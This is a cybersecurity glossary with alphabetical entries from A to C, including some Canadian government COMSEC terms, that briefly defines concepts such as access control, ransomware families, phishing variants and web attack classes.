Acceptable Use Policy - A policy that a user must agree to follow in order to be provided with access to a network or to the Internet.

Acceptance Test–Driven Development ATDD - A collaborative process where developers, testers and business representatives come together to work out requirements, perceive potential pitfalls and reduce the chance of errors before coding begins.

Access Control - Certifying that only authorized access is given to assets (both physical and electronic). For physical assets, access control may be required for a facility or restricted area (e.g. screening visitors and materials at entry points, escorting visitors). For IT assets, access controls may be required for networks, systems, and information (e.g. restricting users on specific systems, limiting account privileges).

Access Control Facility - ACF2 (more formally, CA-ACF2; the ACF stands for Access Control Facility) is a set of programs from Computer Associates that enable security on mainframes.

Access Control List ACL - A table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file.

Access Governance AG - An aspect of Information Technology (IT) security management that seeks to reduce the risks associated with excessive access rights, inactive users and orphan accounts.

Access Layer - Host computers and end users connect to the network.

Access List AL - List of permissions used in physical and information technology (IT) security to control who is allowed contact with a corporate asset.

Access Log - List of all the requests for individual files that people have requested from a Web site.

Access Method - Program or a hardware mechanism that moves data between the computer and an outlying device such as a HDD or SSD or a display terminal.

Access Network - User network that connects subscribers to a particular service provider and, through the carrier network, to other networks such as the Internet.

Access Network Query Protocol ANQP - Query and response protocol that defines services offered by an access point, typically at a Wi-Fi hot spot.

Access Point Base Station - the original term for what is now known as a femtocell.

Access Point Mapping - The act of locating and possibly exploiting connections to wireless local area networks while driving around a city or elsewhere.

Accountable COMSEC Material - COMSEC material requiring control and accountability within the National COMSEC Material Control System (NCMCS) as directed by its Accounting Legend Code (ALC). Control and accountability is required because transfer or disclosure of this material could be detrimental to Canada's national interest. Also known as ACM.

Accumulator - A register for short-term, intermediate storage of arithmetic and logic data in a computer's CPU (central processing unit).

ACID - Atomicity, Consistency, Isolation, and Durability is an acronym and mnemonic device for learning and remembering the four primary attributes ensured to any transaction by a transaction manager (which is also called a transaction monitor).

ACK - In some digital communication protocols, ACK is the name of a signal that data has been received successfully (for example, with an acceptable number of errors).

ACL - An access control list (ACL) is a table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file.

ACM - The ACM (Association for Computing Machinery), founded in 1947, is the largest and oldest international scientific and industrial computer society.

Acoustic Coupler - Hardware device that enables a modem (a device that converts signals from analog to digital and from digital back to analog) to connect to a voice circuit.

Acoustic Wave - A sound wave is the pattern of disturbance caused by the movement of energy traveling through a medium (such as air, water, or any other liquid or solid matter) as it propagates away from the source of the sound.

Acoustic Infection - Type of malware that uses a compromised computer’s sound card and speakers to send data using a covert ultrasonic acoustical mesh network.

Acoustical Mesh Network - A decentralized communication system that transmits data by using sound to connect computers.

ACPI Advanced Configuration and Power Interface - Industry specification for the efficient handling of power consumption in desktop and mobile computers.

ACR - Attenuation-to-crosstalk ratio (ACR), also called headroom, is the difference, expressed as a figure in decibels (dB), between the signal attenuation produced by a wire or cable transmission medium and the near-end crosstalk (NEXT).

Acrobat - Program from Adobe that lets you capture a document and then view it in its original format and appearance.

ACeS Asia Cellular Satellite System Combined cellular telephone and satellite wireless system from Ericsson that provides digital communication service to mobile phone and computer users in the Asia Pacific Region.

ACF2 - More formally, CA-ACF2; the ACF stands for Access Control Facility is a set of programs from Computer Associates that enable security on mainframes.

Adaptive Ransomware Attack - An Adaptive Ransomware Attack (ARA) refers to a ransomware attack that combines advanced automation and real-time human response. Hackers adapt their tools and techniques on the fly to get around defense mechanisms and infect your network with ransomware.

Advance on State-of-the-Art - Rrefers to the highest level of general development, as of a device, technique, or scientific field achieved at a particular time. However, in some contexts it can also refer to a level of development reached at any particular time as a result of the common methodologies employed at the time.

Administrative Privileges - The permissions that allow a user to perform certain functions on a system or network, such as installing software and changing configuration settings.

Advanced Persistent Threat APT - An advanced persistent threat APT is a prolonged and targeted cyberattack in which an intruder gains access to a network and remains undetected for an period of time. The intention of an APT attack is usually to monitor network activity and steal data rather than to cause damage to the network or organization.

Advanced Volatile Threats AVT - Advanced Volatile Threats AVT are threats that use memory-based malware to attack the targets. There are many Fileless Attack categories: Memory-only threats: are attacks that uses vulnerabilities and exploit them to execute the payloads directly in memory.

Adware - Adware, or advertising-supported software, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process.

Angler Exploit Kit - Angler is a covert exploit kit that leverages the vulnerabilities in Adobe Flash, Microsoft Internet Explorer, and Microsoft Silverlight to distribute malicious software to vulnerable machines.

Anomaly Based Detection - Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations. An IDPS using anomaly-based detection has profiles that represent the normal behavior of such things as users, hosts, network connections, or applications.

Anomaly Based Intrusion Detection System - An anomaly-based intrusion detection system, is an intrusion detection system for detecting both network and computer intrusions and misuse by monitoring system activity and classifying it as either normal or anomalous.

Anonymizing Proxy - Anonymizing Proxies are severs that function as an anonymous relay between a user and a destination website to obfuscate web browsing activity. Some proxies also provide a primitive layer of encryption on the user side. Anonymizers are used for a multitude of reasons, both good and bad.

AntiKeyLogger - Piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers looking for similarities which might signal the presence of a hidden keylogger. As anti-keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional antivirus software; some antivirus software do not consider a keyloggers to be malware, as under some circumstances a keylogger can be considered a legitimate piece of software

AntiMalware - Application that maintains computer security and protects sensitive data that is transmitted by a network or stored on local devices. Tools include anti-spyware, phishing tools, and antivirus to isolate viruses, trojans, worms, rootkits, and other known threats.

Anti-Phishing - An anti-phishing service is a technological service that helps prevent unauthorized access to secure and/or sensitive information. Anti-phishing services protect various types of data in diverse ways across a varety of platforms.

AntiSpam - Various anti-spam techniques are used to prevent email spam. No technique is a complete solution to the spam problem, and each has trade-offs between incorrectly rejecting legitimate email as opposed to not rejecting all spam – and the associated costs in time, effort, and cost of wrongfully obstructing good mail.

AntiSpoofing - Antispoofing is a technique for identifying and dropping packets that have a false source address. In a spoofing attack, the source address of an incoming packet is changed to make it appear as if it is coming from a known, trusted source.

AntiSpyware - Anti-spyware is a type of software that is designed to detect and remove unwanted spyware programs. Spyware is a type of malware that is installed on a computer without the user's knowledge in order to collect information about them.

AntiVirus - Antivirus software, or anti-virus software, also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name.

Applicant - Someone who signs up or applies for something. A job applicant for example, often fills out a form and then interviews for the position s/he hopes to get.

Application Level Rootkit - Application level rootkits operate inside the victim computer by changing standard application files with rootkit files, or changing the behavior of present applications with patches, injected code etc.

Application Vulnerability - An application vulnerability is a system flaw or weakness in an application that could be exploited to compromise the security of the application. Once an attacker has found a flaw, or application vulnerability, and determined how to access it, the attacker has the potential to exploit the application vulnerability to facilitate a cyber crime. These crimes target the confidentiality, integrity, or availability (known as the “CIA triad”) of resources possessed by an application, its creators, and its users. Attackers typically rely on specific tools or methods to perform application vulnerability discovery and compromise. According to Gartner Security, the application layer currently contains 90% of all vulnerabilities.

ARP Spoofing - ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Once the attacker’s MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP spoofing can enable malicious parties to intercept, modify or even stop data in-transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol.

Atmos - Atmos itself is representative of a new breed of malware, developed “very precisely”, in order to carry out targeted attacks. Developers go to great pains to fine-tune their new creation; it is still at the early stages, but already poses a sensitive threat. Experts say Atmos may later become much more aggressive, attacking not just banks but other industries too.

Atom Bombing - Atom Bombing is a form of cyber attack that targets a vulnerability with Window’s Atom Tables to inject and execute malicious code. While code injection is a well-known technique, Atom Bombing provides the potential for an attacker to create a breach and set up a persistent presence in a network. Atom tables are used by Windows applications to store integers and data strings that are shared between programs. This type of attack demonstrates how threat actors take advantage of operating systems to use legitimate pieces of those systems maliciously

Attack Online - Online attacks come in many forms and target average individuals and large corporations alike. They usually attempt to steal financial and commercial information, disclose important data and sometimes, they are delivered to simply destroy data or block access to a server.

Attack Signature - An attack signature is a unique piece of information that is used to identify a particular cyber attack aimed at exploiting a known computer system or a software vulnerability. Attack signatures include certain paths used by cyber criminals in their malicious compromise attempts. These paths can define a certain piece of malicious software or an entire class of malware.

Authentication - The process of authentication (or identification) of an individual is usually based on a username and a password. This process is used to allow access to an online location or resource to the right individual by validating the identification.

Authoritative DNS - The term authoritative refers to any DNS servers that has a complete copy of the domain's information, whether it was entered by an administrator or transferred from a primary server. Thus, a secondary server can and should be authoritative for any domain for which it performs secondary authoritative resolution.

Automatic form filler programs - Automatic form-filling programs may prevent keylogging by removing the requirement for a user to type personal details and passwords using the keyboard. Form fillers are primarily designed for web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. However someone with physical access to the machine may still be able to install software that is able to intercept this information elsewhere in the operating system or while in transit on the network. (Transport Layer Security (TLS) reduces the risk that data in transit may be intercepted by network sniffers and proxy tools.)

Autorun Worm - An "autorun worm" is a virus that hijacks an autorun.inf file and runs on your computer without your consent. They might spread over a network through mapped drives or from computer to computer via USB/thumb drives.

Artificial Intelligence AI - A subfield of computer science that develops intelligent computer programs to behave in a way that would be considered intelligent if observed in a human (e.g. solve problems, learn from experience, understand language, interpret visual scenes).

Asymmetric Key - Two related keys (a public key and a private key) that perform complementary operations, such as encrypt and decrypt or generate signatures.

Authorization - Access privileges granted to a user, program, or process.

Availability - The ability for the right people to access the right information or systems when needed. Availability is applied to information assets, software, and hardware (infrastructure and its components). Implied in its definition is that availability includes the protection of assets from unauthorized access and compromise.

top page


Backdoor - An undocumented, private, or less-detectible way of gaining remote access to a computer, bypassing authenticiation measures, and obtaining access to plaintext..

Backdoor Trojan - A backdoor Trojan computer virus is a piece of malicious software that usually finds a way into its victim computers without the knowledge or consent of the owners. Once one of these viruses gets to work in a victim computer, it can enable the computer to be accessed and controlled remotely. This puts all data stored on the computer at risk, as well as endangers anyone who may enter personal information into the computer.

Backup - A backup is an exact copy of your files, your system files or any other system resources you need to protect. This precaution is necessary for all types of unpredictable events, like a system crash or when you remove or lose those files. The backup is supposed to be independent from your system and be used only when necessary.

Back-to-back Frames (Burstability) - Testing requires sending bursts of frames with minimum inter-frame gaps to the DUT and counting the number of frames then forwarded by the DUT. The Back-to-back Frames value is the number of frames in the longest burst of frames – at the highest throughput – the DUT can handle without any frame loss. This calculation helps determine the node buffer capacity.

Bandwidth - Capacity of a wired or wireless network communications link to transmit the maximum amount of data from one point to another over a computer network or internet connection in a given amount of time -- usually one second. Synonymous with capacity, bandwidth describes the data transfer rate.

BAS Bait and Switch - Bad way of changing web page content to earn a page rank. Author creates a web page with a set of keywords. After ranking, the author then procedes to change it with another project or product. When users enter the site, they see something entirely different.

Baseline Security - A Security Baseline defines a set of basic security objectives which must be met by any given service or system. The objectives are chosen to be pragmatic and complete, and do not impose technical means. Therefore, details on how these security objectives are fulfilled by a particular service/system must be documented in a separate "Security Implementation Document".

Beaconing - A common technique in which a threat actor uses malware to connect infrastructure to another system or network, bypassing firewall restrictions on incoming traffic.

Behaviour Based Detection - Behavior-based malware detection helps computer security professionals more quickly identify, block and eradicate malware by using an active approach to malware analysis. Behavior-based malware detection works by identifying malicious software by examining how it behaves rather than what it looks like. Behavior-based malware detection is designed to replace signature-based malware detection. It is sometimes powered by machine learning algorithms.

Bidder - A person or organization making a formal offer for something.

Biometrics - Biometrics is concerned with measuring physical traits and characteristics of abiological organism. Biometrics authentication (or realistic authentication) is used in computer science as a form of identification and access control.

Black-Bag Cryptanalysis - Black-bag cryptanalysis is a euphemism for the acquisition of cryptographic secrets via burglary, or other covert means – rather than mathematical or technical cryptanalytic attack. The term refers to the black bag of equipment that a burglar would carry or a black bag operation.

Black Hat Hackers - Black Hat Hackers are the stereotypical illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy, modify, or steal data, or to make the networks unusable for authorized network users.

Black Hat SEO - Black Hat Search Engine Optimization refers to a set of practices that are used to increases a site or page's rank in search engines through means that violate the search engines' terms of service. The term "black hat" originated in Western movies to distinguish the "bad guys" from the "good guys," who wore white hats.

Blackhole Exploit Kit - The Blackhole exploit kit is, as of 2012, the most prevalent web threat, where 29% of all web threats detected by Sophos and 91% by AVG are due to this exploit kit. Its purpose is to deliver a malicious payload to a victim's computer.

Blacklisting - A blacklist is a list of items in a set that are not accepted. In computer security, a blacklist may be used to exclude which set to detect, quarantine, block, or perform security scans on. This list is exclusionary, confirming that the item being analyzed is not acceptable. It is the opposite of a whitelist, which confirms that items are acceptable.

Blagging - Blagging is when someone makes up a story to gain a person's interest and uses this to encourage them to give away information about themselves, or even send money.

Blended Threat - A blended threat is a widely-used term that describes an online attack that spreads by using a combination of methods, usually a combination of worms, trojans, viruses and other malware. This combination of malware elements that uses multiple attack vectors increases the damage and makes individual systems and networks difficult to defend.

Bloatware - Bloatware is software that has unnecessary features that use large amounts of memory and RAM. Software comes to be known as bloatware when it becomes so unwieldy that its functionality is drowned out by its useless features.

Blockchain - A blockchain is a write-only database, dispersed over a network of interconnected computers, that uses cryptography to create a tamperproof public record of transactions. Because blockchain technology is transparent, secure and decentralized, a central actor cannot alter the public record.

Bogon - An illegitimate IP address that falls into a set of IP addresses that have not been officially assigned to an entity by an internet registration institute, such as the Internet Assigned Number Authority (IANA).

Bogon Filtering - Practice of filtering bogons, which are bogus (fake) IP addresses of a computer network. Bogons include IP packets on the public Internet that contain addresses that are not in any range allocated or delegated by the Internet Assigned Numbers Authority (IANA) or a delegated regional Internet registry (RIR) and allowed for public Internet use. The areas of unallocated address space are called the bogon space.

Boot Loader Level Rootkits - Boot loader Level (Bootkit) Rootkits replaces or modifies the legitimate boot loader with another one thus enabling the Boot loader Level (Bootkit) to be activated even before the operating system is started. Boot loader Level (Bootkit) Rootkits are serious threat to security because they can be used to hack the encryption keys and passwords.

Boot Sector Malware - A boot sector virus is malware that infects the computer storage sector where startup files are found. The boot sector contains all the files required to start the operating system (OS) and other bootable programs.

Bot - Internet bots or web bots are software programs that perform automated tasks and specific operations. Though some bots serve harmless purposes in video games or online locations, there are a number of bots that can be employed in large networks, from wher they can deliver malicious ads on popular sites or launch distributed online attacks against a number of designated targets.

Botnet - A botnet is a network of infected computers that communicate with each other in order to perform the same malicious actions, like launching spam campaigns or distributed denial-of-service attacks. The network can be controlled remotely by online criminals to serve their interests and, at the same time, this allows the hackers to avoid detection or legal actions by law agencies.

Boundary Interface - A network-layer interface between two zone interface points (ZIPs).

Bridge Mode - Configuration that disables the NAT feature on the modem and allows a router to function as a DHCP server without an IP Address conflict. Connecting multiple routers can extend the Wi-Fi coverage in your office/home.

Browser Based Exploitation - A misuse of legitimate browser components to execute malicious code. Simply visiting a website with hidden malicious code can result in exploitation.

Browser Hijacking - Browser hijacking is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.

Brute Force Attack - A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.

Buffer Overflow - In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.

Bug - A bug is a software flaw that produces an unexpected result that may affect the system's performance. Usually, a bug may cause system crashing or freezing. The main security issue that could appear is that bugs allow hackers to bypass access privileges or retrieve sensitive data from a network.

Building MicroServices - The rise of microservices has helped to accelerate the pace of development, as bigger applications are compiled from a number of small components, or microservices, that can be written concurrently. Unit testing technology that evaluates the security of small bits of code should be perfect for testing and building microservices. But when unit testing takes longer than the time required to actually write the code, many software teams may choose not to employ a complete security testing protocol in order to meet aggressive development timelines. Building microservices in a secure way requires technology that can scan bits of code quickly and cost-effectively.

Bulk Encryption - Bulk encryption technology provides a method to encrypt the combined transmission from a multiplexer in its entirety. An encryptor, also called an encipher, is placed between the multiplexer and the transmitter while a decryptor is positioned after the receiver.

Business Email Compromise BEC - Type of scam targeting companies who conduct wire transfers and have suppliers abroad. Corporate or publicly available email accounts of executives or high-level employees related to finance or involved with wire transfer payments are either spoofed or compromised through keyloggers or phishing attacks to do fraudulent transfers, resulting in hundreds of thousands of dollars in losses.

Business Email Compromise Scams - Business email compromise fraud is an email phishing scam that typically targets people who pay bills in businesses, government and nonprofit organizations. The scammer poses as a reliable source, such as the chief executive officer (CEO), who sends an email from a spoofed or hacked account to an accountant or chief financial officer (CFO). The email asks them to wire money, buy gift cards or send personal information, often for a plausible reason. If money is sent, it goes into an account controlled by the con artist.

Business Impact Analysis BIA - Business impact analysis BIA is a systematic process to determine and evaluate the potential effects of an interruption to critical business operations as a result of a disaster, accident or emergency.

BYOD - In the consumerization of IT, BYOD, or bring your own device, is a phrase that has become widely adopted to refer to employees who bring their own computing devices – such as smartphones, laptops and tablets – to the workplace for use and connectivity on the secure corporate network.

top page


Cable Modem - A cable modem is a peripheral device used to connect to the Internet. It operates over coax cable TV lines and provides high-speed Internet access. Since cable modems offer an always-on connection and fast data transfer rates, they are considered broadband devices.

Cache - A cache is a technology to store data and allow future requests to be served at a higher speed. This high-speed storage method is usually used for web pages and online documents, like HTML pages and images, to increase the loading speed and avoid unwanted lag.

Cache Cramming - Cache cramming is a technique to trick a browser into running malicious Java code from the local disk, instead of the Internet. The execution of local code (which runs with less permissions) enables online criminals access the target computer.

Cache Poisoning - Cache poisoning is a type of attack in which corrupt data is inserted into the cache database of the Domain Name System (DNS) name server. The Domain Name System is a system that associates domain names with IP addresses. Devices that connect to the internet or other private networks rely on the DNS for resolving URLs, email addresses and other human-readable domain names into their corresponding IP addresses. In a DNS cache poisoning attack, a malicious party sends forged responses from an imposter DNS in order to reroute a domain name to a new IP address.

Card Reader - A card reader is a data input device that reads data from a card-shaped storage medium. The first were punched card readers, which read the paper or cardboard punched cards that were used during the first several decades of the computer industry to store information and programs for computer systems. Modern card readers are electronic devices that can read plastic cards embedded with either a barcode, magnetic strip, computer chip or another storage medium.

Catfishing - Catfishing is a type of deceptive activity where a person creates a sock puppet social networking presence, or fake identity on a social network account, usually targeting a specific victim for deception. Catfishing is often employed for romance scams on dating websites.

Certified Ethical Hacker - Qualification obtained by demonstrating knowledge of assessing the security of computer systems by looking for weaknesses and vulnerabilities in target systems, using the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system.

Chain of Custody - Chain of custody is used in investigations and in the handling of evidence to ensurethat no gaps in possession occur. Such gaps, if they occurred, could invalidate a case.

Challenge - Address scientific and technological needs/gaps/challenges faced by government. May identify only one challenge or multiple challenges.

Challenge Notice - Multiple notices will be published addressing a challenge(s) faced by various Government of Canada departments and/or agencies. Details related to each Challenge(s) will be published under distinct Challenge Notices. Is a solicitation seeking ideas and/or solutions to a Challenge(s).

Challenge-Response Authentication - In computer security, challenge–response authentication is a family of protocols in which one party presents a question ("challenge") and another party must provide a valid answer ("response") to be authenticated.

Chargeware - Chargeware is seemingly valid looking mobile applications used to charge a user for services without proper notification or knowledge. Often focused on Internet pornography, third-party porn apps are downloaded onto a user's mobile device, in turn infecting their phone with the malware known as Chargeware.

Chief Information Officer CIO - The Chief Information Officer is the title name of the person that is responsible for the information technology system in a company. The job responsibilities include planning the technology architecture, align corporate network to the business developed and develop a secure financial management system for the company.

Ciphertext - A cryptography term for encrypted information.

CISO - CISO (acronym for Chief Information Security Officer) is a senior-level executive job in a company, in the IT or cyber security department. A CISO’s responsibilities include ensuring and maintaining adequate protection for the company’s assets and technology, in terms of both strategy and development, to mitigate and manage cyber security risks. CSO (Chief Security Officer) is another name used for the same job.

Citadel - Citadel Trojan is malware created by a malicious code generating program. Citadel was designed to steal personal information, including banking and financial information, from its victims. The Citadel Trojan, based on the Zeus source code, constructs a botnet consisting of a large number of infected computers.

Classified Information - A Government of Canada label for specific types of sensitive data that, if compromised, could cause harm to the national interest (e.g. national defence, relationships with other countries, economic interests).

Clearing - Applying logical techniques to sanitize data in all user-addressable storage locations to protect against simple ways of recovering data. This is done by overwriting data with a new value, or if overwriting is not supported, by using a menu option to reset the device to factory settings.

Clear Text - Transmitted or stored text that has not been subjected to encryption and is not meant to be encrypted. As such, clear text does not require decryption in order to be displayed. In its simplest form, clear text is rendered as ASCII that can be read by any word processor or text editor. However, clear text can be subjected to encoding in a special format such as Word, WordPerfect or HTML. Any text that can be read on a computer with the appropriate program but without the need for decryption is considered clear text.

Clone Phishing - Clone phishing schemes replicate an email message someone has recently received, adding a malicious link to click on. To explain the duplicate nature of the email and to persuade recipients to click and re-enter personal information, it will usually state that it is being resent in order to provide an updated version.

Cloud Computing - The use of remote servers hosted on the Internet. Cloud computing allows users to access a shared pool of computing resources (such as networks, servers, applications, or services) on demand and from anywhere. Cloud computing is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. The term is generally used to describe data centers available to many users over the Internet.

Code Injection - The code injection technique is usually used by online attackers to change the course of execution of a computer program. This method is used by online criminals to spread malicious software by infecting legitimate websites with malicious code.

Command and Control Center - Command and Control. In the military, the term command and control (C2) means a process (not the systems, as often thought) that commanders, including command organizations, use to plan, direct, coordinate, and control their own and friendly forces and assets to ensure mission accomplishment.

Command and Control Server - A command-and-control [C&C] server is a computer controlled by an attacker or cybercriminal which is used to send commands to systems compromised by malware and receive stolen data from a target network. Many campaigns have been found using cloud-based services, such as webmail and file-sharing services, as C&C servers to blend in with normal traffic and avoid detection.

Commercialization - Process of introducing a new product or method into the market.

Compromise - The intentional or unintentional disclosure of information, which adversely impacts its confidentiality, integrity, or availability.

Compromising Emanations - Unintentional signals that, if intercepted and analyzed, would disclose the information emanating from any information processing system or equipment.

Computer Abuse - Computer abuse is the unethical use of a computer to launch online attacks, like phishing and malware delivery campaigns, sabotage and cyberwar activities.

Computer Forensics - Computer forensics is a branch of digital forensic science pertaining to evidence found in computers and digital storage media.

Computer Incident Response Team CIRT - The Computer Incident Response Team investigates network security incidents that occur when unauthorized access takes place to network resources or protected data. Their job is to analyze how the incident took place and provide a response, by discovering how the breach occurred and what information has been lost.

COMSEC - Communications security (COMSEC) is the discipline of preventing unauthorized access to telecommunications information in readable form, while still delivering the information to the intended recipients. COMSEC is comprised of multiple disciplines such as Cryptographic Security, EMSEC (Emission Security), Transmission Security, and Physical Security.

COMSEC Account Custodian - The person responsible for the receipt, storage, access, distribution, accounting, disposal, and destruction of all COMSEC material charged to the COMSEC account. The custodian is appointed by the organization's COMSEC authority.

COMSEC Incident - An occurrence that threatens, or potentially threatens, the security of classified or protected Government of Canada information as it is being stored, processed, transmitted, or received.

COMSEC Material - An item designed to secure or authenticate telecommunications information (e.g. cryptographic keys, equipment, modules, devices, documents, hardware, firmware, or software the includes or describe cryptographic logic and other items that perform COMSEC functions).

Confidentiality - Confidentiality represents a set of rules or an agreement that limits access or restricts that access to certain types of information. When such an agreement is in place, information is disclosed to only those who are authorized to view it.

Contract - Agreement between two or more persons, which creates an obligation to do or not to do a particular thing.

Controlled Cryptographic Item - An unclassified secure telecommunications or information system, or any associated cryptographic component, governed by a set of control requirements in the National COMSEC Material Control System (NCMCS). The type of item is labelled in the NCMCS as a "controlled cryptographic item" or "CCI".

Cookie - A cookie is a small text file which is placed on your computer when you visit a website. This cookie allows the website to keep track of your visit details and store your preferences. These cookies were designed to be helpful and increase the website speed the next time you access that location. At the same time, they are very useful for advertisers who can match the ads to your interests after they see your browsing history. Usually, cookies and temporary files may affect your privacy since they disclose your online habits, but it is possible to modify your web browser preferences and set a limit.

Cookie Drop/Stuff An affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it.

CoreBOT - CoreBOT is a modular Trojan from the infostealer category. As the name says, CoreBOT was initially designed to collect and loot information from the infected computer or network. In time, CoreBOT quickly evolved and went to add other capabilities, such as browser-based web injects, real-time form-grabbing, Man-in-the-middle attacks, etc. Now, its structure and tactics are similar to infamous financial malware strains, such as Dyreza or Neverquest. Its modular character makes CoreBOT appealing to cyber criminals because they can pack it with other types of malware and use it in complex cyber attacks.

Corporation - Company authorized to act as a single entity and recognized as such in law.

CPU - Central Processing Unit. Sometimes referred to simply as the central processor, but more commonly called a processor, the CPU is the brains of the computer where most calculations take place.

Cracking - Software cracking is the modification of software to remove or disable features which are considered undesirable by the person cracking the software, especially copy protection features (including protection against the manipulation of software, serial number, hardware key, date checks and disc check) or software annoyances like nag screens and adware.

Credentials Management Attack - A credentials management attack attempts to breach username/password pairs and take control of user accounts. Once inside a system, an attacker can alter, steal, or delete data; initiate transactions; install additional malware; and gain broader and deeper access to systems and files.

Credential Stuffing - Credential stuffing is the automated injection of stolen username and password pairs (“credentials”) in to website login forms, in order to fraudulently gain access to user accounts. Credential Stuffing is a subset of the brute force attack category. Brute forcing will attempt to try multiple passwords against one or multiple accounts; guessing a password, in other words. Credential Stuffing typically refers to specifically using known (breached) username / password pairs against other websites.

Crimeware - Crimeware (as distinct from spyware and adware) is designed to perpetrate identity theft through social engineering or technical stealth in order to access a computer user's financial and retail accounts for the purpose of taking funds from those accounts or completing unauthorized transactions that enrich the cyberthief. Alternatively, crimeware may steal confidential or sensitive corporate information. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer confidential information.

Critical Infrastructure - Processes, systems, facilities, technologies, networks, assets, and services essential to the health, safety, security, or economic well-being of Canadians and the effective functioning of government. Critical infrastructure can be stand-alone or interconnected and interdependent within and across provinces, territories, and national borders. Disruptions of critical infrastructure could result in catastrophic loss of life, adverse economic effects, and significant harm to public confidence.

CRLF Injection - CRLF refers to the special character elements "Carriage Return" and "Line Feed." These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and, more importantly, HTTP, use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.

Cross Site Scripting XSS - Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Cross Site Request Forgery - Cross-Site Request Forgery (CSRF) is an attack outlined in the OWASP Top 10 whereby a malicious website will send a request to a web application that a user is already authenticated against from a different website. This way an attacker can access functionality in a target web application via the victim's already authenticated browser. Targets include web applications like social media, in-browser email clients, online banking and web interfaces for network devices.

Cryptanalysis - Cryptanalysis is the study of analyzing information systems in order to study the hidden aspects of the systems. Cryptanalysis is used to breach cryptographic security systems and gain access to the contents of encrypted messages, even if the cryptographic key is unknown.

Cryptographic Material - All material, including documents, devices, and equipment, that contains cryptographic information and is essential to encrypting, decrypting, or authenticating communications

Cryptography - The study of techniques used to make plain information unreadable, as well as to convert it back to a readable form.

CryptoLocker - CryptoLocker is a type of ransomware which emerged in 2013 and whose objective is to infect victims using PCs with Microsoft Windows installed. As is the case with most ransomware, the main distribution method is spam emails with a malicious attachment. CryptoLocker relies on external infrastructure (a botnet) to launch its attacks and, when activated, encrypts the files and data stored on the local device, but also those in cloud storage accounts, if, for example, the Dropbox account is synced locally on the affected PC. CryptoLocker then displays a message so the victims can know that paying a ransom in bitcoins is necessary if they want to get the decryption key (which is stored on the servers controlled by the cyber criminals).

CryptoWall - CryptoWall is a ransomware Trojan which emerged as a CryptoLocker variant. Like most data-stealing ransomware, CryptoWall spreads mainly through phishing and spam campaigns that invite users to click a malicious link or download and execute an email attachment. Moreover, in order to increase distribution, cyber criminals included CryptoWall code in websites ads. The ransomware, once executed, encrypts all the data on the victim’s PC and any other PC tied to the first affected computer by the same network. The victim is then prompted to pay the ransom in bitoins so they can get the decryption key and regain access to their data. CryptoWall has already reached its fourth iteration and there is reason to believe that this won’t be the last one.

CSO - Chief Security Officer is a top-level executive in charge of ensuring the security of a company’s personnel, financial, physical and digital assets. A CSO has both security and business oriented objectives, as he is responsible for aligning cyber protection with the company’s business goals. All security strategies, tactics and programs have to be directed and approved by the CSO. CISO (acronym for Chief Information Security Officer) is another name used for the same job.

CTB Locker - CTB-Locker is a ransomware variant that encrypts files on a victim’s hard disk before demanding a ransom be paid to decrypt the files. CTB-Locker is noteworthy for its high infection rates, use of Elliptic Curve Cryptography, Tor and bitcoins, and its multi-lingual capabilities. The authors of CTB-Locker are using an affiliate program to drive infections by outsourcing the infection process to a network of affiliates or partners in exchange for a cut of the profits.

Cyber Attack - A cyber-attack is considered to be any type of offensive action used by an individual or an organized group that targets computer networks, information systems or a large IT infrastructure by using various means to deploy malicious code for the purpose of stealing, altering or taking any advantage from this type of action. A cyber-attack can appear under different names, from cyber-campaign, cyber-warfare to cyber-terrorism or online attack. In the recent years the software deployed in the online attacks seems to have become more and more sophisticated and the law enforcement agencies around the world have a hard time trying to keep up with this global menace.

Cyber Incident - A cyber incident takes place when there is a violation of a security policy imposed on computer networks and the direct results affect an entire information system.

Cyber Security - Computer security, cybersecurity or information technology security is the protection of computer systems from the theft of or damage to their hardware, software, or electronic data, as well as from the disruption or misdirection of the services they provide.

Cyber Weapon - A cyberweapon is a malware agent employed for military, paramilitary, or intelligence objectives. They can infiltrate whole networks or infect individual computers. They rely on software vulnerabilities, poor cyber hygiene, and people who inadvertently open attachments infected with malware.

top page


